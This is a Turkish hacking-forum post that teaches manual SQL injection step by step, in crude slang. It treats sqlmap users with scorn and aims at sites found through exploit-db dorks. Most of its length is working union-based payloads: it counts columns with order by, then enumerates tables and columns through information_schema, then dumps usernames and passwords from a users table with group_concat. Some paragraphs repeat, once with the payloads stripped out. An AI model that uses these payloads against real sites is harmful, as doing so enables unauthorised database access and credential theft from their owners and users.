Revealed content
evet kardolar şu aralar herkes exploit dbden alınmış 2-3 dorkla sql injectionlı site buluyor sonra koyuyor sqlmap'e siteyi patlattık diye geziniyorlar,şahsen buna acayip ayar olmuş olacağım ki bu konuyu açıyorum.Öncelikle şuna değinelim arkadaşlar acunetixten veya zırt pırt pentest uygulamalarına koyup bulduğunuz sql açığını sqlmap e koyup database çektiğinizde aslında siz çekmiş olmuyorsunuz tüm işi program yapıyor(burada sqlmap'i çok iyi kullananlardan bahsetmiyorum) sonra 2 firewall görünce göt baş dağıtıyonuz eliniz ayağınız birbirine giriyor veya sql'in mantığını kavrayamıyorsunuz nerede ne yapacağınızı bilmiyorsunuz bundan mütevellit çok sade bir şekilde manual sql injection nasıl yapılır bunu anlatacağım size bunu bilmeniz sizin yararınıza olacaktır çünkü PROGRAM İLE HACK YAPILMAZ arkadaşlar,toplaşın giriyorum konuya.
kardolar öncelikle ben testvuln'a giriyorum anlatım için ->

daha sonra

şimdi ise 2 nin arasına


gördüğünüz gibi kolonları görüntüledi ben uname ve pass i çekmek istiyorum bu yüzden

hadi hepinize kolay gelsin bunun daha firewall bypassı vs vs var fakat bu basit anlatım arkadaşlar sünepe gibi gelip bypasslamıyon mu fln demeyin tekmeyi yersiniz ağzınıza
kardolar öncelikle ben testvuln'a giriyorum anlatım için ->
order by 1,2,3,4 diye devam ediyoruz hata alana kadar ben 4te buldum hatayı 4.kolon yani
daha sonra
union select 1,2,3 yazıyoruz 4 tane bulduğumuz için fakat id= in yanına (-) koymayı unutmayın
şimdi ise 2 nin arasına
union select 1,group_concat(table_name),3 from information_schema.tables where tables_schema=database() yazıyoruz bunun anlamı ise database'in içerisindeki tabloları bize görüntüle demek
union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' yazıyoruz burada ise users tablomuzun içerisinde bulunan kolonları bize görüntüle diyoruz
gördüğünüz gibi kolonları görüntüledi ben uname ve pass i çekmek istiyorum bu yüzden
union select 1,group_concat(uname,0x3d,pass),3 from users(tablo ismimiz) dedim ilk başta burada bulunan 0x3d nin ne anlama geldiğini bilmiyor olabilirsiniz 0x3d(=) anlamına geliyor string bir değeri hex kodu haline getiriyoruz ve html'e uyarlı olması için başına 0x getiriyoruz.
hadi hepinize kolay gelsin bunun daha firewall bypassı vs vs var fakat bu basit anlatım arkadaşlar sünepe gibi gelip bypasslamıyon mu fln demeyin tekmeyi yersiniz ağzınıza
Bu içeriği görmek için giriş yapın.
Moderatör tarafında düzenlendi: